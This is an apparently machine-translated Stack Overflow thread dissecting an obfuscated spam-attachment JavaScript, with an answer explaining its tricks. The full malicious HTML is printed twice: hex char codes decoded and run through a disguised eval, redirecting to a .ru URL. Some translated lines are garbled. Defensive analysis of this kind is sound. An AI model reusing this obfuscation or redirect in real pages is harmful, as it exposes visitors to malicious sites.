今天早上我收到了一些垃圾邮件。我注意到附件是一个 .html 文件。我没有将其丢弃,而是将其视为一次学习机会,将其复制到我的桌面并将其重命名为 .txt,然后将其加载到记事本中。
这是出现在垃圾邮件附件中的 html + 混淆脚本:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>asgq= [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0; try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
z=s;e(s);}}</script>
</body>
</html>
我做的第一件事是将它排成一行,使其更具可读性:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1}
catch(gdsgsdg)
{
zz=3;
dbshre=56;
if(dbshre){
vfvwe=0;
try{}
catch(agdsg)
{vfvwe=1;}
if(!vfvwe){
e=window["e".concat("val")];
s="";
for(i=0;i-105!=0;i++){
if(window.document)
s+=String.fromCharCode(asgq[i]);
}
z=s;
e(s);
}
}
</script>
</body>
</html>
此时很明显,脚本作者将好东西作为字符代码隐藏在 asgq 数组中。 0x76 = "v", 0x61 = "a", 0x72 = "r", 等等...嗯,前 3 个元素已经拼出了 "var"!
asgq.length = 105。在 for 循环中,作者使用的结束条件是“i-105!=0”,这是一种令人困惑的说法,即 i < asgq.length。 “zz=3;”似乎什么都不做/不参与脚本的其余部分。在第一个 catch 语句之后还有一个不匹配的“{”。
我运行了 for 循环并将数组解包到一个警告框中。这是我得到的:
" var1=49; 变量 2=变量 1; 如果(var1==var2){document.location="http://giliaonso.ru:8080/forum/links/column.php";} "
所以作者正在经历使用字符代码制作 49=49 的麻烦,如果 49=49,则 window.location = russian site。
我的问题:
作者正在使用 try 缓存语句。第一个尝试条件是(document.body&=0.1)。这是设计为失败并转到语句的缓存部分还是这是一些按位操作?如果是按位,为什么是“=0.1”?
第一个缓存正在传递“agdsg”。我只见过通过了“e”的缓存(e)。传递除 e 之外的任何值有什么作用?
“e=window["e".concat("val")]; 这一行到底是什么?正在做?我似乎在充当作者稍后调用的函数声明:“e(s);” “s”是解压缩的数组。
如有任何帮助,我们将不胜感激。
最佳答案
1) 这会尝试将 0 分配给 document.body,这将引发错误:
document.body&=0.1
//is the same as
document.body = document.body & 0.1;
//document.body & *anything* returns 0
2) catch 接受一个可变的名字作为参数,你可以随意命名它(包括agdsg。
3) 让我们稍微分解一下:
e=window["e".concat("val")];
//"e".concat("val") returns "eval"
e=window["eval"]
//which gives you the global "eval()" function
基本上,作者将该数组解码为要执行的代码字符串,然后使用 eval() 来运行它。他们不只是使用 eval("var ...") 的原因是混淆 eval off(以及字符串)使得过滤器(或人类)更难看到它正在运行评估。如果它知道它正在运行 eval,它可能会检查字符串并停止重定向代码。
关于Javascript - 混淆 - 向坏人学习,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/15232851/